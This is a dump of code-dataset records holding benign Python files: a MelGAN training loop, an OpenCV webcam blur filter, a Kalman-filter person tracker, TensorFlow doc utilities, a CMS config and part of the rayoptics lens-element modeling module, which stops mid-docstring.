ModelCheckpoint(prefix=cfg.save_checkpoint_name, directory=cfg.save_checkpoint_path, config=config_ck)\n cb_params = _InternalCallbackParam()\n cb_params.train_network = gen_network_train_wrap\n cb_params.epoch_num = cfg.epoch_size\n run_context = RunContext(cb_params)\n ckpt_cb.begin(run_context)\n\n i = 1\n print(cfg.epoch_size)\n epoch_t = time.perf_counter()\n\n # epoch loop\n for epoch in range(cfg.epoch_size):\n cb_params.cur_epoch_num = epoch + 1\n for data, wav, datad, wavd in dataset.create_tuple_iterator():\n scaling_sens = Tensor(scale_manager.get_loss_scale(), dtype=mstype.float32)\n start = time.perf_counter()\n data = (data + 5.0) / 5.0\n datad = (datad + 5.0) / 5.0\n\n _, loss_G, cond_g = gen_network_train_wrap(Tensor(wav, mstype.float32), Tensor(data, mstype.float32),\n scaling_sens)\n\n _, loss_D, cond_d = dis_network_train_wrap(Tensor(datad, mstype.float32), Tensor(wavd, mstype.float32),\n scaling_sens)\n if cond_g:\n scale_manager.update_loss_scale(cond_g)\n else:\n scale_manager.update_loss_scale(False)\n if cond_d:\n scale_manager.update_loss_scale(cond_d)\n else:\n scale_manager.update_loss_scale(False)\n duration = time.perf_counter() - start\n\n print('{}epoch {}iter loss_G={} loss_D={} {:.2f}s/it'.format(epoch+1, i, loss_G.asnumpy(), loss_D.asnumpy(),\n duration))\n\n i = i + 1\n if cfg.rank == 0:\n cb_params.cur_step_num = i\n cb_params.batch_num = i\n ckpt_cb.step_end(run_context)\n\n duration = time.perf_counter() - epoch_t\n print('finish in {:.2f}mins'.format(duration / 60))\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"official/audio/MELGAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529330555","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\n\r\nimport cv2\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef myfunc(i):\r\n\r\n pass # do nothing\r\n\r\n\r\n\r\ncv2.namedWindow('filter') # create win with win name\r\n\r\n\r\n\r\ncv2.createTrackbar('value', # name of value\r\n\r\n 'filter', # win name\r\n\r\n 0, # min\r\n\r\n 100, # max\r\n\r\n myfunc) # callback func\r\n\r\n\r\n\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\r\n\r\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 
480)\r\n\r\n\r\n\r\n\r\n\r\nwhile(True):\r\n\r\n\r\n\r\n ret, frame = cap.read()\r\n\r\n if not ret: continue\r\n\r\n\r\n\r\n\r\n\r\n v = cv2.getTrackbarPos('value', # get the value\r\n\r\n 'filter') # of the win\r\n\r\n\r\n\r\n ## do something by using v\r\n\r\n if v!=0:\r\n\r\n kernel = np.ones((v,v),np.float32)/(v**2)\r\n\r\n frame2 = cv2.filter2D(frame,-1,kernel)\r\n\r\n else:\r\n\r\n kernel = np.ones((1,1),np.float32)\r\n\r\n frame2 = cv2.filter2D(frame,-1,kernel)\r\n\r\n\r\n\r\n cv2.imshow('filter', frame2) # show in the win\r\n\r\n\r\n\r\n k = cv2.waitKey(1)\r\n\r\n if k == ord('q') or k == 27:\r\n\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213275303","text":"import uuid\n\nimport numpy as np\nfrom filterpy.kalman import KalmanFilter\n\nfrom .utils import convert_bbox_to_sort_representation, convert_sort_representation_to_bbox\nfrom common.models import BasePersonTrack\n\n\nclass PersonBoxTracker(BasePersonTrack):\n \"\"\"\n This class is the base class for the tracked objects and contains its state.\n \"\"\"\n\n def __init__(self, bbox):\n \"\"\"\n Initialize the tracker using the initial bbox\n :param bbox: The initial bounding box\n \"\"\"\n super(PersonBoxTracker, self).__init__()\n self.kalman_filter = KalmanFilter(dim_x=7, dim_z=4) # Constant velocity model\n self.kalman_filter.F = np.array(\n [[1, 0, 0, 0, 1, 0, 0], [0, 1, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1]])\n self.kalman_filter.H = np.array(\n [[1, 0, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0]])\n\n self.kalman_filter.R[2:, 2:] *= 10.\n self.kalman_filter.P[4:, 4:] *= 1000. 
# give high uncertainty to the unobservable initial velocities\n self.kalman_filter.P *= 10.\n self.kalman_filter.Q[-1, -1] *= 0.01\n self.kalman_filter.Q[4:, 4:] *= 0.01\n\n self.kalman_filter.x[:4] = convert_bbox_to_sort_representation(bbox[:4]).reshape((4, -1))\n self.__id = uuid.uuid4()\n self.time_since_update = 0\n self.history = []\n self.hits = 0\n self.hit_streak = 0\n self.age = 0\n\n def update(self, bbox):\n \"\"\"\n Updates the object with the observed bbox\n :param bbox:\n :return:\n \"\"\"\n self.time_since_update = 0\n self.history = []\n self.hits += 1\n self.hit_streak += 1\n self.kalman_filter.update(convert_bbox_to_sort_representation(bbox[:4]))\n\n def predict(self):\n \"\"\"\n Advances the state vector and returns the predicted bounding box estimate\n :return:\n \"\"\"\n if (self.kalman_filter.x[6] + self.kalman_filter.x[2]) <= 0:\n self.kalman_filter.x[6] *= 0.0\n self.kalman_filter.predict()\n self.age += 1\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(convert_sort_representation_to_bbox(self.kalman_filter.x).reshape((-1, 4)))\n return self.history[-1]\n\n @property\n def id(self):\n return self.__id.hex\n\n @property\n def bbox(self):\n \"\"\"\n Returns the current bounding box estimate\n :return:\n \"\"\"\n return convert_sort_representation_to_bbox(self.kalman_filter.x)\n","sub_path":"sort/person_box_tracker.py","file_name":"person_box_tracker.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111780987","text":"# coding=utf-8\n# Copyright 2021 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Documentation utils for the website.\n\nNote: To be detected, doc decorators should be applied between descriptors\nand other decorators.\n\n```py\nclass A:\n\n @staticmethod\n @tfds.core.utils.docs.deprecated\n @other_decorator\n def f():\n pass\n```\n\n\"\"\"\n\nfrom tensorflow.tools.docs import doc_controls # pylint: disable=g-direct-tensorflow-import\n\n\ndef _no_op_decorator(obj):\n return obj\n\n\ntry:\n deprecated = doc_controls.set_deprecated\n doc_private = doc_controls.doc_private\n do_not_doc = doc_controls.do_not_generate_docs\n # Same as `do_not_doc`, but also applied to childs\n do_not_doc_inheritable = doc_controls.do_not_doc_inheritable\n # Document the parent, but not the childs\n do_not_doc_in_subclasses = doc_controls.do_not_doc_in_subclasses\nexcept AttributeError:\n # Decorators are only required by `tensorflow_docs` which uses tf-nightly\n # It can be no-op for older versions of TF.\n deprecated = _no_op_decorator\n doc_private = _no_op_decorator\n do_not_doc = _no_op_decorator\n do_not_doc_inheritable = _no_op_decorator\n do_not_doc_in_subclasses = 
_no_op_decorator\n","sub_path":"tensorflow_datasets/core/utils/docs.py","file_name":"docs.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504962976","text":"import FWCore.ParameterSet.Config as cms\r\n\r\nrunProcess = cms.PSet(\r\n input = cms.string(\"/data/Analysis/42x/DYJetsToLL.root\"),\r\n outdir = cms.string(\"./\"),\r\n useFitter=cms.bool(False),\r\n isMC = cms.bool(True),\r\n evStart = cms.int32(0),\r\n evEnd = cms.int32(10000),\r\n dirName = cms.string(\"evAnalyzer/data\"),\r\n jobfile = cms.string(\"./test/xsec_42X.txt\"),\r\n )\r\n","sub_path":"MyAnalysis/ZXSection/test/BU_runAnalysis_cfg.py","file_name":"BU_runAnalysis_cfg.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"398995344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright © 2018 Michael J. Hayford\n\"\"\" Module for element modeling\n\n.. Created on Sun Jan 28 16:27:01 2018\n\n.. codeauthor: Michael J. Hayford\n\"\"\"\n\nfrom collections import namedtuple\nimport itertools\nfrom packaging import version\n\nimport numpy as np\n\nfrom anytree import Node\n\nimport rayoptics\n\nimport rayoptics.util.rgbtable as rgbt\nimport rayoptics.oprops.thinlens as thinlens\nfrom rayoptics.elem import parttree\nfrom rayoptics.elem.profiles import Spherical, Conic\nfrom rayoptics.elem.surface import Surface\nfrom rayoptics.seq.gap import Gap\nfrom rayoptics.seq.medium import Glass, glass_decode\n\nimport rayoptics.gui.appcmds as cmds\nfrom rayoptics.gui.actions import (Action, AttrAction, SagAction, BendAction,\n ReplaceGlassAction)\n\nimport opticalglass.glassfactory as gfact\nimport opticalglass.glasspolygons as gp\n\nGraphicsHandle = namedtuple('GraphicsHandle', ['polydata', 'tfrm', 'polytype',\n 'color'], defaults=(None,))\nGraphicsHandle.polydata.__doc__ = \"poly data in local coordinates\"\nGraphicsHandle.tfrm.__doc__ = \"global transformation for polydata\"\nGraphicsHandle.polytype.__doc__ = \"'polygon' (for filled) or 'polyline'\"\nGraphicsHandle.color.__doc__ = \"RGBA for the polydata or None for default\"\n\n\n\"\"\" tuple grouping together graphics rendering data\n\n Attributes:\n polydata: poly data in local coordinates\n tfrm: global transformation for polydata\n polytype: 'polygon' (for filled) or 'polyline'\n\"\"\"\n\n\n# --- Factory functions\ndef create_thinlens(power=0., indx=1.5, sd=None, **kwargs):\n tl = thinlens.ThinLens(power=power, ref_index=indx, max_ap=sd, **kwargs)\n tle = ThinElement(tl)\n tree = tle.tree()\n return [[tl, None, None, 1, +1]], [tle], tree\n\n\ndef create_mirror(c=0.0, r=None, cc=0.0, ec=None,\n power=None, profile=None, sd=None, **kwargs):\n '''Create a sequence and element for a mirror.\n\n Args:\n c: vertex curvature\n r: vertex radius of curvature\n cc: conic constant\n ec: 1 + cc\n power: optical power of the mirror\n sd: semi-diameter\n profile: Spherical or Conic type, or a profile instance\n '''\n delta_n = kwargs['delta_n'] if 'delta_n' in kwargs else -2\n if power:\n cv = power/delta_n\n elif r:\n cv = 1.0/r\n else:\n cv = c\n\n if ec:\n k = ec - 1.0\n else:\n k = cc\n\n if profile is Spherical:\n prf = Spherical(c=cv)\n elif profile is Conic:\n prf = Conic(c=cv, cc=k)\n elif profile is not None:\n prf = profile\n else:\n if k == 0.0:\n prf = Spherical(c=cv)\n else:\n prf = Conic(c=cv, cc=k)\n\n m = Surface(profile=prf, interact_mode='reflect', max_ap=sd,\n 
delta_n=delta_n, **kwargs)\n ele_kwargs = {'label': kwargs['label']} if 'label' in kwargs else {}\n me = Mirror(m, sd=sd, **ele_kwargs)\n\n tree = me.tree()\n\n return [[m, None, None, 1, -1]], [me], tree\n\n\ndef lens_from_power(power=0., bending=0., th=None, sd=1.,\n med=None, nom_wvl='d'):\n if med is None:\n med = Glass()\n rndx = med.rindex(nom_wvl)\n\n if th is None:\n th = sd/5\n \n if bending == -1:\n cv2 = -power/(rndx - 1)\n cv1 = 0\n else:\n B = (bending - 1)/(bending + 1)\n a = (rndx - 1)*(th/rndx)*B\n b = 1 - B\n c = -power/(rndx - 1)\n cv1 = (-b + np.sqrt(b**2 - 4*a*c))/(2*a)\n cv2 = cv1*B\n\n return cv1, cv2, th, rndx, sd\n \n\ndef create_lens(power=0., bending=0., th=None, sd=1., med=None, **kwargs):\n if med is None:\n med = Glass()\n lens = lens_from_power(power=power, bending=bending, th=th, sd=sd,\n med=med)\n cv1, cv2, th, rndx, sd = lens\n\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd, delta_n=(rndx - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd, delta_n=(1 - rndx))\n g = Gap(t=th, med=med)\n le = Element(s1, s2, g, sd=sd)\n tree = le.tree()\n\n return [[s1, g, None, rndx, 1], [s2, None, None, 1, 1]], [le], tree\n\n\ndef achromat(power, Va, Vb):\n \"\"\"Compute lens powers for a thin doublet achromat, given their V-numbers.\"\"\"\n power_a = (Va/(Va - Vb))*power\n power_b = (Vb/(Vb - Va))*power\n return power_a, power_b\n\n\ndef create_cemented_doublet(power=0., bending=0., th=None, sd=1.,\n glasses=('N-BK7,Schott', 'N-F2,Schott'),\n **kwargs):\n from opticalglass.spectral_lines import get_wavelength\n from opticalglass import glass\n wvls = np.array([get_wavelength(w) for w in ['d', 'F', 'C']])\n gla_a = gfact.create_glass(glasses[0])\n rndx_a = gla_a.calc_rindex(wvls)\n Va, PcDa = glass.calc_glass_constants(*rndx_a)\n gla_b = gfact.create_glass(glasses[1])\n rndx_b = gla_b.calc_rindex(wvls)\n Vb, PcDb = glass.calc_glass_constants(*rndx_b)\n\n power_a, power_b = achromat(power, Va, Vb)\n\n if th is None:\n th = sd/4\n t1 = 3*th/4\n t2 = th/4\n if power_a < 0:\n t1, t2 = t2, t1\n\n lens_a = lens_from_power(power=power_a, bending=bending, th=t1, sd=sd,\n med=gla_a)\n cv1, cv2, t1, indx_a, sd = lens_a\n\n # cv1 = power_a/(rndx_a[0] - 1)\n # delta_cv = -cv1/2\n # cv1 += delta_cv\n # cv2 = delta_cv\n # cv3 = power_b/(1 - rndx_b[0]) + delta_cv\n indx_b = rndx_b[0]\n cv3 = (power_b/(indx_b-1) - cv2)/((t2*cv2*(indx_b-1)/indx_b) - 1)\n\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd,\n delta_n=(rndx_a[0] - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd,\n delta_n=(rndx_b[0] - rndx_a[0]))\n s3 = Surface(profile=Spherical(c=cv3), max_ap=sd,\n delta_n=(1 - rndx_b[0]))\n\n g1 = Gap(t=t1, med=gla_a)\n g2 = Gap(t=t2, med=gla_b)\n\n g_tfrm = np.identity(3), np.array([0., 0., 0.])\n\n ifc_list = []\n ifc_list.append([0, s1, g1, 1, g_tfrm])\n ifc_list.append([1, s2, g2, 1, g_tfrm])\n ifc_list.append([2, s3, None, 1, g_tfrm])\n ce = CementedElement(ifc_list)\n tree = ce.tree()\n\n return [[s1, g1, None, rndx_a, 1],\n [s2, g2, None, rndx_b, 1],\n [s3, None, None, 1, 1]], [ce], tree\n\n\ndef create_dummy_plane(sd=1., **kwargs):\n s = Surface(**kwargs)\n se = DummyInterface(s, sd=sd)\n tree = se.tree()\n return [[s, None, None, 1, +1]], [se], tree\n\n\ndef create_air_gap(t=0., **kwargs):\n g = Gap(t=t)\n ag = AirGap(g, **kwargs)\n tree = ag.tree()\n return g, ag, tree\n\n\ndef create_from_file(filename, **kwargs):\n opm = cmds.open_model(filename)\n sm = opm['seq_model']\n osp = opm['optical_spec']\n em = opm['ele_model']\n pt = opm['part_tree']\n if 
len(pt.nodes_with_tag(tag='#element')) == 0:\n parttree.elements_from_sequence(em, sm, pt)\n if 'power' in kwargs:\n desired_power = kwargs['power']\n cur_power = osp.parax_data.fod.power\n # scale_factor is linear, power is 1/linear\n # so use reciprocal of power to compute scale_factor\n scale_factor = cur_power/desired_power\n sm.apply_scale_factor(scale_factor)\n seq = [list(node) for node in sm.path(start=1, stop=-1)]\n seq[-1][2] = None\n sys_nodes = pt.nodes_with_tag(tag='#element#airgap',\n not_tag='#object#image')\n eles = [node.id for node in sys_nodes]\n root = Node('file', id=None, tag='#group', children=sys_nodes)\n return seq, eles, root\n\n\ndef calc_render_color_for_material(matl):\n \"\"\" get element color based on V-number of glass\"\"\"\n try:\n gc = float(matl.glass_code())\n except AttributeError:\n return (255, 255, 255, 64) # white\n else:\n # set element color based on V-number\n indx, vnbr = glass_decode(gc)\n dsg, rgb = gp.find_glass_designation(indx, vnbr)\n if rgb is None:\n return [228, 237, 243, 64] # ED designation\n# rgb = Element.clut.get_color(vnbr)\n return rgb\n\n\n# --- Element definitions\nclass Element():\n \"\"\"Lens element domain model. Manage rendering and selection/editing.\n\n An Element consists of 2 Surfaces, 1 Gap, and edge_extent information.\n\n Attributes:\n parent: the :class:`ElementModel`\n label: string identifier\n s1: first/origin :class:`~rayoptics.seq.interface.Interface`\n s2: second/last :class:`~rayoptics.seq.interface.Interface`\n gap: element thickness and material :class:`~rayoptics.seq.gap.Gap`\n tfrm: global transform to element origin, (Rot3, trans3)\n medium_name: the material filling the gap\n flat1, flat2: semi-diameter of flat or None. Setting to None will result in \n re-evaluation of flat ID\n do_flat1, do_flat2: 'if concave', 'always', 'never', 'if convex'\n handles: dict of graphical entities\n actions: dict of actions associated with the graphical handles\n \"\"\"\n clut = rgbt.RGBTable(filename='red_blue64.csv',\n data_range=[10.0, 100.])\n\n label_format = 'E{}'\n serial_number = 0\n\n def __init__(self, s1, s2, g, tfrm=None, idx=0, idx2=1, sd=1.,\n label=None):\n if label is None:\n Element.serial_number += 1\n self.label = Element.label_format.format(Element.serial_number)\n else:\n self.label = label\n\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s1 = s1\n self.s1_indx = idx\n self.s2 = s2\n self.s2_indx = idx2\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self._sd = sd\n self.flat1 = None\n self.flat2 = None\n self.do_flat1 = 'if concave' # alternatives are 'never', 'always',\n self.do_flat2 = 'if concave' # or 'if convex'\n self.handles = {}\n self.actions = {}\n\n @property\n def sd(self):\n \"\"\"Semi-diameter \"\"\"\n return self._sd\n\n @sd.setter\n def sd(self, semidiam):\n self._sd = semidiam\n self.edge_extent = (-semidiam, semidiam)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s1']\n del attrs['s2']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n fmt = 'Element: {!r}, {!r}, t={:.4f}, sd={:.4f}, glass: {}'\n return fmt.format(self.s1.profile, self.s2.profile, self.gap.thi,\n self.sd, self.gap.medium.name())\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n # when restoring, we want to use the stored indices to look up the\n # new object instances\n self.parent = ele_model\n 
self.tfrm = tfrms[self.s1_indx]\n        self.s1 = surfs[self.s1_indx]\n        self.gap = gaps[self.s1_indx]\n        self.s2 = surfs[self.s2_indx]\n        if not hasattr(self, 'medium_name'):\n            self.medium_name = self.gap.medium.name()\n        if not hasattr(self, 'do_flat1'):\n            self.do_flat1 = 'if concave'\n        if not hasattr(self, 'do_flat2'):\n            self.do_flat2 = 'if concave'\n\n    def sync_to_update(self, seq_model):\n        # when updating, we want to use the stored object instances to get the\n        # current indices into the interface list (e.g. to handle insertion and\n        # deletion of interfaces)\n        self.s1_indx = seq_model.ifcs.index(self.s1)\n        self.s2_indx = seq_model.ifcs.index(self.s2)\n        self.medium_name = self.gap.medium.name()\n\n    def tree(self, **kwargs):\n        \"\"\"Build tree linking sequence to element model. \"\"\"\n\n        default_tag = '#element#lens'\n        tag = default_tag + kwargs.get('tag', '')\n        zdir = kwargs.get('z_dir', 1)\n\n        # Interface branch 1\n        e = Node('E', id=self, tag=tag)\n        p1 = Node('p1', id=self.s1.profile, tag='#profile', parent=e)\n        Node(f'i{self.s1_indx}', id=self.s1, tag='#ifc', parent=p1)\n\n        # Gap branch\n        t = Node('t', id=self.gap, tag='#thic', parent=e)\n        Node(f'g{self.s1_indx}', id=(self.gap, zdir), tag='#gap', parent=t)\n\n        # Interface branch 2\n        p2 = Node('p2', id=self.s2.profile, tag='#profile', parent=e)\n        Node(f'i{self.s2_indx}', id=self.s2, tag='#ifc', parent=p2)\n\n        return e\n\n    def reference_interface(self):\n        return self.s1\n\n    def reference_idx(self):\n        return self.s1_indx\n\n    def interface_list(self):\n        return [self.s1, self.s2]\n\n    def gap_list(self):\n        return [self.gap]\n\n    def get_bending(self):\n        cv1 = self.s1.profile_cv\n        cv2 = self.s2.profile_cv\n        delta_cv = cv1 - cv2\n        bending = 0.\n        if delta_cv != 0.0:\n            bending = (cv1 + cv2)/delta_cv\n        return bending\n\n    def set_bending(self, bending):\n        cv1 = self.s1.profile_cv\n        cv2 = self.s2.profile_cv\n        delta_cv = cv1 - cv2\n        cv2_new = 0.5*(bending - 1.)*delta_cv\n        cv1_new = bending*delta_cv - cv2_new\n        self.s1.profile_cv = cv1_new\n        self.s2.profile_cv = cv2_new\n\n    def update_size(self):\n        extents = np.union1d(self.s1.get_y_aperture_extent(),\n                             self.s2.get_y_aperture_extent())\n        self.edge_extent = (extents[0], extents[-1])\n        self.sd = max(self.s1.surface_od(), self.s2.surface_od())\n        return self.sd\n\n    def compute_flat(self, s):\n        ca = s.surface_od()\n        if (1.0 - ca/self.sd) >= 0.05:\n            flat = ca\n        else:\n            flat = None\n        return flat\n\n    def extent(self):\n        if hasattr(self, 'edge_extent'):\n            return self.edge_extent\n        else:\n            return (-self.sd, self.sd)\n\n    def render_shape(self):\n        def use_flat(do_flat, is_concave):\n            # do_flat is one of 'always', 'never', 'if concave', 'if convex'\n            if do_flat == 'always':\n                return True\n            elif do_flat == 'if concave' and is_concave:\n                return True\n            elif do_flat == 'if convex' and not is_concave:\n                return True\n            return False\n        is_concave_s1 = self.s1.profile_cv < 0.0\n        is_concave_s2 = self.s2.profile_cv > 0.0\n\n        if use_flat(self.do_flat1, is_concave_s1):\n            if self.flat1 is None:\n                flat1 = self.flat1 = self.compute_flat(self.s1)\n            else:\n                flat1 = self.flat1\n        else:\n            flat1 = None\n        poly = self.s1.full_profile(self.extent(), flat1)\n\n        if use_flat(self.do_flat2, is_concave_s2):\n            if self.flat2 is None:\n                flat2 = self.flat2 = self.compute_flat(self.s2)\n            else:\n                flat2 = self.flat2\n        else:\n            flat2 = None\n        poly2 = self.s2.full_profile(self.extent(), flat2, -1)\n\n        for p in poly2:\n            p[0] += self.gap.thi\n        poly += poly2\n        poly.append(poly[0])\n        return poly\n\n    def render_handles(self, opt_model):\n        self.handles = {}\n        ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n        shape = 
self.render_shape()\n color = calc_render_color_for_material(self.gap.medium)\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon',\n color)\n\n extent = self.extent()\n if self.flat1 is not None:\n extent_s1 = self.flat1,\n else:\n extent_s1 = extent\n poly_s1 = self.s1.full_profile(extent_s1, None)\n gh1 = GraphicsHandle(poly_s1, ifcs_gbl_tfrms[self.s1_indx], 'polyline')\n self.handles['s1_profile'] = gh1\n\n if self.flat2 is not None:\n extent_s2 = self.flat2,\n else:\n extent_s2 = extent\n poly_s2 = self.s2.full_profile(extent_s2, None, -1)\n gh2 = GraphicsHandle(poly_s2, ifcs_gbl_tfrms[self.s2_indx], 'polyline')\n self.handles['s2_profile'] = gh2\n\n poly_sd_upr = []\n poly_sd_upr.append([poly_s1[-1][0], extent[1]])\n poly_sd_upr.append([poly_s2[0][0]+self.gap.thi, extent[1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append([poly_s2[-1][0]+self.gap.thi, extent[0]])\n poly_sd_lwr.append([poly_s1[0][0], extent[0]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n self.handles['ct'] = GraphicsHandle(poly_ct, self.tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = BendAction(self)\n shape_actions['y'] = AttrAction(self, 'sd')\n shape_actions['glass'] = ReplaceGlassAction(self.gap)\n self.actions['shape'] = shape_actions\n\n s1_prof_actions = {}\n s1_prof_actions['pt'] = SagAction(self.s1)\n self.actions['s1_profile'] = s1_prof_actions\n\n s2_prof_actions = {}\n s2_prof_actions['pt'] = SagAction(self.s2)\n self.actions['s2_profile'] = s2_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_lwr'] = sd_lwr_action\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\nclass Mirror():\n\n label_format = 'M{}'\n serial_number = 0\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=1., thi=None, z_dir=1.0,\n label=None):\n if label is None:\n Mirror.serial_number += 1\n self.label = Mirror.label_format.format(Mirror.serial_number)\n else:\n self.label = label\n\n self.render_color = (158, 158, 158, 64)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s = ifc\n self.s_indx = idx\n self.z_dir = z_dir\n self.sd = sd\n self.flat = None\n self.thi = thi\n self.medium_name = 'Mirror'\n self.handles = {}\n self.actions = {}\n\n def get_thi(self):\n thi = self.thi\n if self.thi is None:\n thi = 0.05*self.sd\n return thi\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n thi = self.get_thi()\n fmt = 'Mirror: {!r}, t={:.4f}, sd={:.4f}'\n return fmt.format(self.s.profile, thi, self.sd)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.s_indx]\n self.s = surfs[self.s_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Mirror'\n\n def sync_to_update(self, seq_model):\n self.s_indx = seq_model.ifcs.index(self.s)\n\n def tree(self, **kwargs):\n default_tag = '#element#mirror'\n tag = default_tag + 
kwargs.get('tag', '')\n # Interface branch\n m = Node('M', id=self, tag=tag)\n p = Node('p', id=self.s.profile, tag='#profile', parent=m)\n Node(f'i{self.s_indx}', id=self.s, tag='#ifc', parent=p)\n\n # Gap branch = None\n\n return m\n\n def reference_interface(self):\n return self.s\n\n def reference_idx(self):\n return self.s_indx\n\n def interface_list(self):\n return [self.s]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.edge_extent = self.s.get_y_aperture_extent()\n self.sd = self.s.surface_od()\n return self.sd\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n self.edge_extent = self.s.get_y_aperture_extent()\n return self.edge_extent\n\n def substrate_offset(self):\n thi = self.get_thi()\n # We want to extend the mirror substrate along the same direction\n # of the incoming ray. The mirror's z_dir is following reflection so\n # flip the sign to get the preceding direction.\n offset = -self.z_dir*thi\n return offset\n\n def render_shape(self):\n poly = self.s.full_profile(self.extent(), self.flat)\n poly2 = self.s.full_profile(self.extent(), self.flat, -1)\n\n offset = self.substrate_offset()\n\n for p in poly2:\n p[0] += offset\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polygon', self.render_color)\n\n poly = self.s.full_profile(self.extent(), None)\n self.handles['s_profile'] = GraphicsHandle(poly,\n ifcs_gbl_tfrms[self.s_indx],\n 'polyline')\n\n offset = self.substrate_offset()\n\n poly_sd_upr = []\n poly_sd_upr.append(poly[-1])\n poly_sd_upr.append([poly[-1][0]+offset, poly[-1][1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append(poly[0])\n poly_sd_lwr.append([poly[0][0]+offset, poly[0][1]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = SagAction(self.s)\n self.actions['shape'] = shape_actions\n\n s_prof_actions = {}\n s_prof_actions['pt'] = SagAction(self.s)\n self.actions['s_profile'] = s_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'edge_extent[1]')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'edge_extent[0]')\n self.actions['sd_lwr'] = sd_lwr_action\n\n return self.actions\n\n\nclass CementedElement():\n \"\"\"Cemented element domain model. 
